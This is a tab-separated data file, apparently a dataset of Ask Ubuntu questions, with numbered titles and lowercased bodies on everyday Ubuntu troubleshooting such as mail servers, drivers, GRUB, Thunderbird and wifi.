371562	does tally software work on ubuntu 12.04 or latest version	we are trying to in-stole tally software on all desktop , which will also have ubuntu . we have multiuser legal licenses.can it be helpful to use .
371563	port 25 smtp port connection refused	i just settup my postfix on my vps with the help of this guide : https : //www.exratione.com/2012/05/a-mailserver-on-ubuntu-1204-postfix-dovecot-mysql/ everything works , can send mails , recive it , etc etc ... .on localhost . when i try to acces it from my own computer , nothing happens , and when i try telnet mail.example.com smtp it says connection refused . every config is just like in that guide .
371564	adobe reader not initializing	adobe reader stopped working . there is no response when i start adobe reader either using gui or terminal . this is the error i get when i type $ acroread in to the terminal : /opt/adobe/reader9/reader/intellinux/bin/acroread : error while loading shared libraries : libstdc++.so.6 : can not open shared object file : no such file or directory can i get any help ? i am using ubuntu 13.10 .
371569	how to recover data after failed ubuntu installation on the wrong drive ?	while installing ubuntu i mistakenly selected the wrong disc ( in this case , i wanted to install on drive e : ) , and almost at the end of the installation process i got an error message like this : defective cd , burn the cd at lower speeds , try from usb or disc error i booted from windows xp and drive d : is not shown . tried from ubuntu cd and my files are missing , so i presume the whole disc was formatted . i would like to recover my data . my pc does not boot from usb .
371575	thunderbird display error in unity	problem description i keep getting display errors in thunderbird . the table of emails has painting issues . when i start clicking around it happens that some rows simply disappear or are being painted completely in the tags color ( i.e . todo=blue or later=purple ) . hovering the mouse over display errors solves it unfocusing the windows solved it as well . sadly this makes it impossible to take a screenshot of the display errors . at least taking a screenshot either by pressing print or using shutter always results in screenshots without display errors . graphics card info i am using the default graphics driver with an ati card : ~ $ lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] cedar [ radeon hd 5000/6000/7350/8350 series ] [ 1002:68f9 ] : ~ $ dmesg | egrep 'drm|radeon' [ 11.822035 ] [ drm ] initialized drm 1.1.0 20060810 [ 11.826264 ] [ drm ] radeon defaulting to kernel modesetting . [ 11.826267 ] [ drm ] radeon kernel modesetting enabled . [ 11.826453 ] [ drm ] initializing kernel modesetting ( cedar 0x1002:0x68f9 0x174b:0xe127 ) . [ 11.826480 ] [ drm ] register mmio base : 0xfe620000 [ 11.826481 ] [ drm ] register mmio size : 131072 [ 11.826552 ] radeon 0000:01:00.0 : vram : 1024m 0x0000000000000000 - 0x000000003fffffff ( 1024m used ) [ 11.826555 ] radeon 0000:01:00.0 : gtt : 512m 0x0000000040000000 - 0x000000005fffffff [ 11.831216 ] [ drm ] detected vram ram=1024m , bar=256m [ 11.831219 ] [ drm ] ram width 64bits ddr [ 11.831664 ] [ drm ] radeon : 1024m of vram memory ready [ 11.831665 ] [ drm ] radeon : 512m of gtt memory ready . [ 11.831679 ] [ drm ] gart : num cpu pages 131072 , num gpu pages 131072 [ 11.848236 ] [ drm ] loading cedar microcode [ 11.966086 ] [ drm ] pcie gart of 512m enabled ( table at 0x0000000000040000 ) . [ 11.966184 ] radeon 0000:01:00.0 : wb enabled [ 11.966186 ] radeon 0000:01:00.0 : fence driver on ring 0 use gpu addr 0x0000000040000c00 and cpu addr 0xffff880203a8dc00 [ 11.966188 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 11.966189 ] [ drm ] driver supports precise vblank timestamp query . [ 11.966218 ] radeon 0000:01:00.0 : irq 55 for msi/msi-x [ 11.966225 ] radeon 0000:01:00.0 : radeon : using msi . [ 11.966248 ] [ drm ] radeon : irq initialized . [ 11.982413 ] [ drm ] ring test on 0 succeeded in 1 usecs [ 11.982563 ] [ drm ] ib test on ring 0 succeeded in 0 usecs [ 11.982709 ] [ drm ] radeon display connectors [ 11.982709 ] [ drm ] connector 0 : [ 11.982710 ] [ drm ] dvi-i-1 [ 11.982711 ] [ drm ] hpd4 [ 11.982712 ] [ drm ] ddc : 0x6440 0x6440 0x6444 0x6444 0x6448 0x6448 0x644c 0x644c [ 11.982713 ] [ drm ] encoders : [ 11.982713 ] [ drm ] dfp1 : internal_uniphy [ 11.982714 ] [ drm ] crt1 : internal_kldscp_dac1 [ 11.982715 ] [ drm ] connector 1 : [ 11.982716 ] [ drm ] dvi-i-2 [ 11.982716 ] [ drm ] hpd2 [ 11.982717 ] [ drm ] ddc : 0x6430 0x6430 0x6434 0x6434 0x6438 0x6438 0x643c 0x643c [ 11.982718 ] [ drm ] encoders : [ 11.982719 ] [ drm ] dfp2 : internal_uniphy1 [ 11.982719 ] [ drm ] crt2 : internal_kldscp_dac2 [ 11.982750 ] [ drm ] internal thermal controller with fan control [ 11.982768 ] [ drm ] radeon : power management initialized [ 12.049323 ] [ drm ] fb mappable at 0xe0142000 [ 12.049325 ] [ drm ] vram apper at 0xe0000000 [ 12.049325 ] [ drm ] size 14745600 [ 12.049326 ] [ drm ] fb depth is 24 [ 12.049327 ] [ drm ] pitch is 10240 [ 12.049369 ] fbcon : radeondrmfb ( fb0 ) is primary device [ 12.049454 ] fb0 : radeondrmfb frame buffer device [ 12.049455 ] drm : registered panic notifier [ 12.049460 ] [ drm ] initialized radeon 2.18.0 20080528 for 0000:01:00.0 on minor 0 installed addons : conversations 2.7 lighning 2.6.2 autoarchive 0.2.2 eds contact integration 0.6 messaging menu and unity launcher integration 1.3.1 possible reasons converstations addon . as mentioned by jos the conversation addon appears to be causing this . it is not . but without converstaions addon the error is harder to reproduce . see also this conversations addon ticket and this issue on bugzilla screenshot
371578	i ca n't remote my ubuntu server 12.04 on vmware workstation 7 from putty	i 've just install ubuntu server 12.04 on vmware workstation 7 , when i ping to my host 192.168.10.103 is conected , ping to 8.8.8.8 = > conected sudo apt-get update or sudo apt-get upgrade - > it 's work apt-get install ssh openssh-server - > it 's work fyi : ubuntu server on vmware workstation 7 : ip addres : 192.168.10.5 netmask : 255.255.255.0 gateway : 192.168.10.1 network : 192.168.10.0 broadcast : 192.168.10.255 dns-nameserver : 192.168.10.1 my pc ( win xp sp3 ) : ip addres : 192.168.10.103 netmask : 255.255.255.0 gateway : 192.168.10.1 on my vmware network i choose bridged the problem is : i ca n't remote my ubuntu server 12.04 on vmware workstation 7 from putty ( no respond in screen/ screen is blank ) . i send too the printscreen for adding your informations . http : //www.mediafire.com/view/myfiles/ # 74c4jnlv03zihze http : //www.mediafire.com/view/myfiles/ # 7dvy4atynnm6mih
371579	how to exclude directories and file zipping a directory ?	i , need to zip a directory excluding some subdirectory and file ; i used this : zip -r zipfile.zip . -x `` . * '' -x `` app/bower_components '' -x `` node_modules '' -x `` *.zip '' -x `` node_modules '' without any success ; node_modules is a folder in the principal one while bower_components is inside the folder app
371580	thunderbird accounts disappeared	i 'm having a critical problem with thunderbird . yesterday all my acount suddenly disappeared from tb gui ( it seems that they still are on my home ) . i tried this : recovering a profile that suddenly disappeared ยง lost profile and ยงrecovering data from your old profile . but no success . i 'm having that messages in the tb console : ` -- -- -- -- -- -- -- -- -- -- - with extensions and plugin activated horodatage : 05/11/2013 09:36:05 erreur : typeerror : components.classes [ cid ] is undefined fichier source : resource : //calendar/modules/calutils.jsm - > file : /// { home } /extensions/ % 7be2fda1a4-762b-4020-b5ad-a41df1933103 % 7d/calendar-js/calutils.js ligne : 22 horodatage : 05/11/2013 09:36:05 erreur : typeerror : components.classes [ cid ] is undefined fichier source : resource : //calendar/modules/calutils.jsm - > file : /// { home } /extensions/ % 7be2fda1a4-762b-4020-b5ad-a41df1933103 % 7d/calendar-js/calutils.js ligne : 22 horodatage : 05/11/2013 09:36:05 erreur : typeerror : components.classes [ cid ] is undefined fichier source : resource : //calendar/modules/calutils.jsm - > file : /// { home } /extensions/ % 7be2fda1a4-762b-4020-b5ad-a41df1933103 % 7d/calendar-js/calutils.js ligne : 22 horodatage : 05/11/2013 09:36:05 erreur : typeerror : components.classes [ cid ] is undefined fichier source : resource : //calendar/modules/calutils.jsm - > file : /// { home } /extensions/ % 7be2fda1a4-762b-4020-b5ad-a41df1933103 % 7d/calendar-js/calutils.js ligne : 22 horodatage : 05/11/2013 09:36:05 erreur : ns_error_xpc_gs_returned_failure : component returned failure code : 0x80570016 ( ns_error_xpc_gs_returned_failure ) [ nsijscid.getservice ] fichier source : resource : //calendar/modules/calutils.jsm - > file : /// { home } /extensions/ % 7be2fda1a4-762b-4020-b5ad-a41df1933103 % 7d/calendar-js/calutils.js ligne : 98 failed to load native module at path '/ { home } /extensions/ { e2fda1a4-762b-4020-b5ad-a41df1933103 } /components/linux_x86_64-gcc3/libcalbasecomps.so ' : ( 80004005 ) /usr/lib/thunderbird/libxul.so : version `xul24.0 ' not found ( required by / { home } /extensions/ { e2fda1a4-762b-4020-b5ad-a41df1933103 } /components/linux_x86_64-gcc3/libcalbasecomps.so ) -- -- -- -- -- -- -- -- -- -- -- - safe mode // all plugins deactivated while creating services from category 'profile-after-change ' , could not create service for entry 'disk space watcher service ' , contract id ' @ mozilla.org/toolkit/disk-space-watcher ; 1' timestamp : 05/11/2013 09:46:59 error : typeerror : this._sort [ 0 ] is undefined source file : resource : //gre/modules/dbviewwrapper.js line : 1424 note that i get that problem with tb24.0 ( it was yesterday morning ) . since tb has been updated to 24.1 , i updated but no changes .
371583	what i have to do to install proprietary drivers ?	i have ubuntu 13.10 , and i want to use it to play games on wine , like league of legends and world of warcraft , so i 'm trying to install proprietary drivers . i have an ati mobility radeon hd 5470 , so the question is if i have to only click here ( the pick is not mine ) in fglrx-updates ? or i have to download something ? another question , is 3d acceleration enabled with this drivers ? thanks : )
371585	how to add icon and screenshot for my app .deb package to see it in ubuntu software center ?	i created a .deb package of application by myself and i want to add to it icon and screenshot to visualize it in application manager such as ubuntu software center . when i launch my package by double-click . for example , when i launch virtualbox or skype packages their icon and screenshot appear . how can i make this ? is it possible ?
371586	xpad crashes after clicking on `` show desktop ''	this question is about xpad on ubuntu 13.10 . i can start the application and write a note . if i click on another application , the note disappears and it re-appears if i click again on xpad on the launcher . so far so good . however , when i click on the `` show desktop '' button on the launcher xpad crashes , that is , if i click again on xpad on the launcher nothing happens . right click + quit works . after re-starting xpad it works again fine except that the old note has disappeared . any solutions ?
371593	date shows in incorrect language	there are a little problem . i had download ubuntu 12.04 lts on my native lang , but , 'cause translation incomplete and inaccurate in some places , i switched to english ( without reinstalled ) . mostly it was done , but date in right upper corner ( unity ) shows in my native lang , while i 'd prefer english . time'n'date settings does n't contain preferred lang ... so , how i can handle with it ?
371594	how to configure grub to boot an os based on key press ?	i 'm total new to linux / grub but not new to changing configurations . i play much with configs and i like to try out many things and what is possible . so i will try now linux . i have now different linux / windows on my laptop and want to try if its possible to boot different os based on the pressed key . i.e . : grub is invisible ( or just shown as a logo , so i know that i can now press a key ) start laptop - > post - > grub starts - > f1 pressed - > grub gui becomes visible start laptop - > post - > grub starts - > f2 pressed - > ubuntu starts start laptop - > post - > grub starts - > f3 pressed - > something else starts start laptop - > post - > grub starts - > nothing pressed - > windows starts
371595	for pulseaudio what does tsched do ( and what are the defaults ) ?	if i modify /etc/pulse/default.pa and change this line : load-module module-udev-detect to : load-module module-udev-detect tsched=0 i am clearly disabling tsched . similarly if i change the line to , load-module module-udev-detect tsched=yes i am enabling tsched . both of these are verifiable by running , pactl list | grep tsched and looking into documentation , tsched since 0.9.11 . use system-timer based model ( aka glitch-free ) . defaults to 1 ( enabled ) . if your hardware does not return accurate timing information ( e.g . creative sound cards ) you can try to set tsched=0 to enable the interupt based timing which was used in 0.9.10 and before . however i have two machines ( different hardware ) , one which returns tsched=yes and one which does not . is the default really 1 ( enabled/yes ) ? is there a way to verify that it really is enabled if it does n't show up in pactl ? what ( in hardware ) decides if it really is enabled ?
371596	setting a group to inherit properties with remmina	i am using remmina to connect to many servers across my network , sorted into groups . is there a way to edit/set a group to inherit usernames/passwords from the group ? similar to the `` inherit properties '' options in windows rdcman . i need this so that i can quickly update the connection info when my passwords change . i am using ubuntu 13.10 . if this is not possible in remmina , is there an alternative that will ?
371598	webcam not detected ? lenovo t430	i have an integrated webcam in my lenovo t430 , and it is apparently supported on ubuntu 12.04 . i do n't see it listed when i run lsusb or lspci . any other options i can try ? it should be compatible with my system ( ubuntu 12.04 , kernel 3.5.0-42-generic ) . i have tried the hardware on/off key based on other forum posts . it is not showing up in lsusb : ryan @ ryan : ~/code/notebooks $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub it should return something like the following ( based on another laptop that i believe to be a working clone ) : lsusb | grep chi bus 001 device 005 : id 04f2 : b2da chicony electronics co. , ltd here is a dump from lsinput [ code ] ryan @ ryan : ~/code/notebooks $ lsinput open /dev/input/event0 : permission denied ryan @ ryan : ~/code/notebooks $ sudo lsinput /dev/input/event0 bustype : bus_host vendor : 0x0 product : 0x5 version : 0 name : `` lid switch '' phys : `` pnp0c0d/button/input0 '' bits ev : ev_syn ev_sw /dev/input/event1 bustype : bus_host vendor : 0x0 product : 0x3 version : 0 name : `` sleep button '' phys : `` pnp0c0e/button/input0 '' bits ev : ev_syn ev_key /dev/input/event2 bustype : bus_host vendor : 0x0 product : 0x1 version : 0 name : `` power button '' phys : `` lnxpwrbn/button/input0 '' bits ev : ev_syn ev_key /dev/input/event3 bustype : bus_i8042 vendor : 0x1 product : 0x1 version : 43860 name : `` at translated set 2 keyboard '' phys : `` isa0060/serio0/input0 '' bits ev : ev_syn ev_key ev_msc ev_led ev_rep /dev/input/event4 bustype : bus_host vendor : 0x17aa product : 0x5054 version : 16641 name : `` thinkpad extra buttons '' phys : `` thinkpad_acpi/input0 '' bits ev : ev_syn ev_key ev_msc ev_sw /dev/input/event5 bustype : bus_i8042 vendor : 0x2 product : 0x7 version : 433 name : `` synps/2 synaptics touchpad '' phys : `` isa0060/serio1/input0 '' bits ev : ev_syn ev_key ev_abs /dev/input/event6 bustype : bus_host vendor : 0x0 product : 0x6 version : 0 name : `` video bus '' phys : `` lnxvideo/video/input0 '' bits ev : ev_syn ev_key /dev/input/event7 bustype : ( null ) vendor : 0x0 product : 0x0 version : 0 name : `` hda intel pch hdmi/dp , pcm=8 '' phys : `` alsa '' bits ev : ev_syn ev_sw /dev/input/event8 bustype : ( null ) vendor : 0x0 product : 0x0 version : 0 name : `` hda intel pch hdmi/dp , pcm=7 '' phys : `` alsa '' bits ev : ev_syn ev_sw /dev/input/event9 bustype : ( null ) vendor : 0x0 product : 0x0 version : 0 name : `` hda intel pch hdmi/dp , pcm=3 '' phys : `` alsa '' bits ev : ev_syn ev_sw /dev/input/event10 bustype : ( null ) vendor : 0x0 product : 0x0 version : 0 name : `` hda intel pch dock mic '' phys : `` alsa '' bits ev : ev_syn ev_sw /dev/input/event11 bustype : ( null ) vendor : 0x0 product : 0x0 version : 0 name : `` hda intel pch mic '' phys : `` alsa '' bits ev : ev_syn ev_sw /dev/input/event12 bustype : ( null ) vendor : 0x0 product : 0x0 version : 0 name : `` hda intel pch dock headphone '' phys : `` alsa '' bits ev : ev_syn ev_sw /dev/input/event13 bustype : ( null ) vendor : 0x0 product : 0x0 version : 0 name : `` hda intel pch headphone '' phys : `` alsa '' bits ev : ev_syn ev_sw /dev/input/event14 bustype : bus_i8042 vendor : 0x2 product : 0xa version : 0 name : `` tpps/2 ibm trackpoint '' phys : `` synaptics-pt/serio0/input0 '' bits ev : ev_syn ev_key ev_rel [ /code ] it should return something analogous to : /dev/input/event4 bustype : bus_usb vendor : 0x4f2 product : 0xb2da version : 1312 name : `` integrated camera '' phys : `` usb-0000:00:1a.0-1.6/button '' bits ev : ev_syn ev_key any ideas on what more to try ? thanks !
371602	netflix not taking up full screen	i have been having problems using netflix with pipelight in ubuntu . i have tried looking for answers online but i have had no luck finding anything helpful . i can maximize netflix using pipelight . however the top panel does not disappear when i am watching netflix in full screen on a separate monitor . any help would be appreciated . thanks .
371603	installing steam on ubuntu 13.10 - need execute permissions	i 'm using ubuntu 13.10 for the first time ( new desktop , figured i 'd grab a linux partition ) . i had a partition of a second hard drive i wanted to use for linux file storage . i went to put my steam library there , but apparently i do n't have execute permissions and so could n't do it . i tried giving permissions to my group as another forum member suggested in another post ( in files > properties ) , but as soon as i changed the settings they immediately changed back . how can i get this to work ? cheers .
371604	sending udp packets with `logger` command	i have couple different solutions for running custom syslog server ( based on https : //gist.github.com/marcelom/4218010 ) . the problem i am facing is that the following command does not send udp packets to the server : logger -n 127.0.0.1 -p 514 `` test message '' do i properly send a test message ? any ideas on what i am doing wrong ? the scripts apparently should work , but i am unable to confirm they work during tests . edit : i confirmed that syslog receiver is indeed receiving messages sent with udp protocol . thus i also clarified the question removing this piece .
371607	ubuntu 12.04 installed using windows installer unexpectedly shuts down seconds after booting	i recently installed ubuntu 12.04 on windows 7 using the windows installer . however only a few seconds after booting into ubuntu , my pc shutdowns unexpectedly . iam using hp pavillion 2313ax laptop . running an amd a10 4600 apu . with display driver : amd radeon hd 7660g . please help me out . thanks .
371611	save gparted information to file	i need to save some information about the current partitioning of my hard drive . i already did fdisk -l > file.txt gparted tells a bit more information ( label , size , used ) . is it possible to make gparted save this information to a file ?
371619	move tmp folder from '/ ' partition to mounted partition ( /mnt )	i have an amazon ec2 instance which has given me a tiny '/ ' partition and a large '/mnt ' partition . as such , i have moved my mysql data-dir over to the /mnt partition . however i am now having issues with the /tmp folder running out of space on my massive join queries and am trying to also move /tmp to /mnt/tmp . i tried to do this with a symlink but that results in the mysql service being unable to start . please advise on how to move the storage of /tmp over to /mnt ( /dev/xvdb )
371620	ubuntu reboot problem	after what i inseret my usb stick in my laptop to see if i can boot ubuntu from it and it was ok . when i took the usb stick from the laptop and opened it again , it says to me until now this and i ca n't even go to mydesktop , nor boot , nothing : error : unknown filesystem . grub rescue > what can i do forthis problem ? can youhelp me ?
371623	ubuntugnome , radeon 7750	currently have the 13.12 ... .rc6 kernal and the latest catalyst beta drivers . however , some of the performance is n't very good ( tabs on chrome do n't show text , ca n't play paintball2 higher resolution than 800x600 and often linux becomes unresponsive . anyone managed to get good support for the hd 77xx series ?
371629	ntm is not visible	i state that are starting out with ubuntu and i wonder if ntm ( the manager x data traffic ) is compatible with ubuntu 10.13 version , and if it is , why can not i see the icon and the application window , thank you .
371630	change contrast/gamma in external monitor	i am running ubuntu 13.10 64bit on a computer that has only intel hd graphics ( i.e . no dedicated graphic card like nvidia ) . i recently dug up my old crt ( a 15 '' hcl ) , and it looks a bit dull when connected to my laptop ( the laptop screen looks fine ) . i was able to get around this on windows by using the color enhancement sliders in intel graphics properties . i tried using https : //apps.ubuntu.com/cat/applications/brightness-controller/â , but the screen looks dull even with the setting at full is there any way to do this ( i.e . change contrast/gamma for external monitor only ) ?
371633	picstart+ programming with sdcc	i am trying to use sdcc to program a 12f675 pic with a picstart+ programmer . my problem is i can not locate the header files for sdcc . # include `` pic/12f675.h '' gives me blink.c:7:28 : error : pic/pic12f675.h : no such file or directory i tried using find / -name pic12f675.h but nothing was returned . i am using 13.04 ubuntu , can anyone help me get started on this ?
371634	how to reset a lost admin password ?	how can i reset a lost administrative password , considering that ubuntu and windows7 are both installed on the computer , considering also that `` boot up the machine , and after the bios screen , hold down the left shift key . '' did n't logged me to any thing , just continue the loading of the system as normal ? ?
371635	laptop overheating problem in ubuntu 12.04 only	i 'm having the problem of overheating on my ubuntu partition . acpitz-virtual-0 adapter : virtual device temp1 : +82.0°c ( crit = +95.0°c ) temp2 : +77.0°c ( crit = +95.0°c ) k10temp-pci-00c3 adapter : pci adapter temp1 : +88.5°c ( high = +70.0°c ) top shows that chrome and avahi are my only two processes running at the moment , both below 25 % . i 'm running ubuntu 12.04 on a gateway nv53 with amd athlon ii x2 mx300 processor . i 've read through other threads related to this problem but can not figure out the problem . some have suggested it is the graphics driver , but if i open up `` additional drivers '' then i just get `` there are no proprietary drivers are in use on this system '' . can anyone help me sovle the problem of constant overheating ?
371636	ca n't install ubuntu newer than 8.04 -intel 855gm graphics card	i have an old laptop with an intel graphics card . i ca n't install any ubuntu newer than 8.04 because the installer fails . i tried to install ubuntu 12.04 yesterday , and got a message that the graphics card is not supported . i 'll reboot the computer to get the exact message . the message : graphics initialization failed . error setting up gfxboot . i can write something in the next line : `` boot : _ '' this is my video card : 00:02.1 display controller : intel corporation 82852/855gm integrated graphics device ( rev 02 ) subsystem : lg electronics , inc . unknown device 000a flags : bus master , fast devsel , latency 0 memory at f0000000 ( 32-bit , prefetchable ) [ size=128m ] memory at e0080000 ( 32-bit , non-prefetchable ) [ size=512k ] capabilities : < access denied >
371638	hardware switch only turns off bluetooth , while wifi stays on	i 've got dell latitude e6540 with ubuntu 13.10 64bit installed on it . the laptop has a hardware switch to turn off wireless . in windows , it turns off both bluetooth and wifi , but in ubuntu , it only turns off bluetooth . rfkill list with the switch on shows both the wifi and bt devices as unblocked . rfkill list with the switch off shows only the wifi device and shows it as unblocked , too . is there a way to make the hardware switch work the way i want it ? : )
371648	virtualbox minecraft server	so i 'm running ubuntu server 12.04 in virtualbox and trying to host a server in it . i literally got everything set up , installed , and it 's perfect . i forwarded my ports to 25565 tcp and udp with this command : -a input -p tcp -- dport 25565 -j accept -a input -p udp -- dport 25565 -j accept i read that you must not use anything below java 6 , so i 'm using java 8 now . still did n't work . i 've done everything i could find and i 've spent a good day or two . please help , i forgot to mention . i have bridged connection set up too .
371649	unable to connect to wpa2 personal	today i 've installed a new asus rt-n10e router , as i switched from dsl to a cable isp . honestly , i ca n't recall which security settings i used on the previous one . thing is , that 's i want it to be wpa2 personal ( with aes , that an only option in my router ) ; wpa-tkip works at about 50 mb/s but i want the better 60 mb/s throughput and security of wpa2-aes . windows xp and both phones connect to the wlan correctly . my ubuntu 13.10 with broadcom sta driver ( bcm4313 ) also connects to the network , at least the indicator says so , but i ca n't access the internet w/ wpa2-aes . i put the results of the wireless-info script on pastebin.com because of the question length limitation . so , here it is : http : //pastebin.com/2xj6myit
371655	where is the alternate installation iso for ubuntu saucy ?	i would like to download the alternate installation iso for the current release , ubuntu 13.10 saucy salamander , but i ca n't find it on the releases.ubuntu.com website . are n't alternate isos provided anymore ? i need the alternate iso because xorg crashes on recent versions of ubuntu when using old sis on board graphics . in fact , i just patched ubuntu sources and generated a custom package for the xserver-xorg-video-sis driver on my ppa to try fix this problem , after installing with the minimal iso .
371658	no launcher after kernel 3.11.7 update	so i recently updated to kernel 3.11.7 to try and fix some crashing issues in ubuntu . the update went fine but when i restarted the launcher didnt show up on the desktop . i have tried to use ccsm but for some reason when i try to check the ubuntu unity plug-in box it asks to enable opengl and a couple other things and then if i reboot it is unchecked . im running ubuntu 13.04 and was just installed a couple days ago . edit : would it be beneficial to install gnome 3.0 ?
371681	how can i have rythmbox controls on xubuntu desktop/xfce ?	in ubuntu 12.04 with unity , rythmbox basic controls ( play , pause , next and previous song ) were accessible on the desktop from the sound notification icon . now i 'm running ubuntu 12.04 with xubuntu desktop with xfce upgraded to 4.10 . i still use rythmbox . any way of setting up a similar feature on xfce ? i tried the 'now playing ' screenlet set to use rythmbox , but it does not work and from what i 've read , screenlets are discontinued . even their website is unreachable . then i tried out conky scripts , but i have not come across a conky script for rythmbox controls . anyone knows such a script ? even if anyone could come up with short shell script or let me know terminal commands to 1 ) play 2 ) pause 3 ) goto next song 4 ) goto previous song it would be much appreciated and i could either save it on the desktop or in a panel as executable file/icons , or create keyboard shortcuts to the scripts and use it that way ! thanks !
371682	style windows like aura window manager from chromium os	how can i style my desktop windows to be like aura window manager on my ubuntu machine without installing chromium os or alternative ? is there any already built theme for ubuntu ? note that i only want to apply the window border style . i do n't want for example the bottom launcher .
371683	change mouse vertical speed independently	i would like to be able to change the mouse horizontal and vertical speed independently . i find that my logitech mx510 does not feel right at all due to the fact that vertical speed is sluggish in comparison to the horizontal .
371687	how to carry audio over ssh ?	is there a way to carry audio over ssh ? say after connecting to remote machine through ssh -x i opened a browser and want to watch a youtube video . currently i could only able to watch the video without any audio . but i want to hear the audio too . how to do that ?
371688	ubuntu 12.04 on macbook pro 9,1 . wireless internet disconnects intermittently	i recently installed ubuntu 12.04 on my mac . the wireless driver is showing an erratic behavior and disconnects every now and then . please help ! lspci -nn ; dmesg|tail 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port [ 8086:0151 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm77 express chipset lpc controller [ 8086:1e57 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm57765 gigabit ethernet pcie [ 14e4:16b4 ] ( rev 10 ) 01:00.1 sd host controller [ 0805 ] : broadcom corporation bcm57765/57785 sdxc/mmc card reader [ 14e4:16bc ] ( rev 10 ) 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) 03:00.0 firewire ( ieee 1394 ) [ 0c00 ] : lsi corporation fw643 [ truefire ] pcie 1394b controller [ 11c1:5901 ] ( rev 08 ) [ 22.882591 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 23.907477 ] postgres ( 1203 ) : /proc/1203/oom_adj is deprecated , please use /proc/1203/oom_score_adj instead . [ 25.938139 ] wlan0 : authenticate with 20 : aa:4b : db:4a:24 [ 25.949524 ] wlan0 : send auth to 20 : aa:4b : db:4a:24 ( try 1/3 ) [ 25.955097 ] wlan0 : authenticated [ 25.957258 ] wlan0 : associate with 20 : aa:4b : db:4a:24 ( try 1/3 ) [ 25.959769 ] wlan0 : rx assocresp from 20 : aa:4b : db:4a:24 ( capab=0x411 status=0 aid=1 ) [ 25.960221 ] wlan0 : associated [ 25.960656 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 27.922445 ] init : plymouth-stop pre-start process ( 1650 ) terminated with status 1
371691	i ca n't access windows 8.1 after installing ubuntu 13.10	i installed windows 8.1 onto my cyberpowerpc desktop and decided shortly thereafter to install ubuntu 13.10 off of a usb flash drive . i can not access windows 8.1 anymore and no grub appears . the bios ( gigabyte visual ) only recognizes the following three entries : `` ubuntu '' , `` p0 '' , and `` p4 '' . the latter two tell me to insert bootable media and do n't have access to windows .
371693	how to get icon-names for mime-types in a bash script ?	is there a way to convert the output of file -- mime-type file e.g . `` application/pdf '' into an icon-name , depending on the current icon-theme , or even a full link ? where is that specified ? i ca n't find anything like that in my index.theme files
371694	how to select the architecture to download ?	i 'm a completely new user of linux and since my computer is not a good machine i wanted to install 32 bit os , i downloaded ubuntu desktop for 32 bit but when i check in system settings under details it says my os type is 64 bit , i downloaded it from the site http : //www.ubuntu.com/download/desktop choose ubuntu 12.04 lts and set it as 32-bit ( machines with less than 2gb ram ) .
371698	displaylink usb vga adapter being loaded as audio device	i 'm new to the world of linux , please try to bare with me . if i 'm using commands wrong or misunderstand , a shove in the right direction would be greatly appreciated . i 'm attempting to make the switch over to linux , running kubuntu 13.10 with kernel 3.11.0-12-generic . i use an evga uv+39 usb-vga adapter for a 3rd monitor , which works in windows ; black screen in linux . the device appears to be recognized . ness @ ness-linux : /etc/modprobe.d $ lsusb | grep displaylink bus 001 device 010 : id 17e9:4300 displaylink i 've verified that udl module was loaded . ness @ ness-linux : /etc/modprobe.d $ lsmod | grep ^udl udl 24626 0 when plugging in the device , i see the following in dmesg log . ness @ ness-linux : /etc/modprobe.d $ dmesg|tail -10 [ 8629.279904 ] usb 1-2 : new high-speed usb device number 10 using ehci-pci [ 8629.413228 ] usb 1-2 : new usb device found , idvendor=17e9 , idproduct=4300 [ 8629.413233 ] usb 1-2 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 8629.413236 ] usb 1-2 : product : 100-u3-uv39 [ 8629.413239 ] usb 1-2 : manufacturer : displaylink [ 8629.413242 ] usb 1-2 : serialnumber : 1112001t129290133 [ 8629.417225 ] usb_audio : warning ! unlikely big volume range ( =511 ) , cval- > res is probably wrong . [ 8629.417229 ] usb_audio : [ 14 ] fu [ digital in playback volume ] ch = 6 , val = -8176/0/16 < 6 > from this , i 'm inferring that my adapter is being profiled as an audio device ? when looking at the sound mixer , i can also 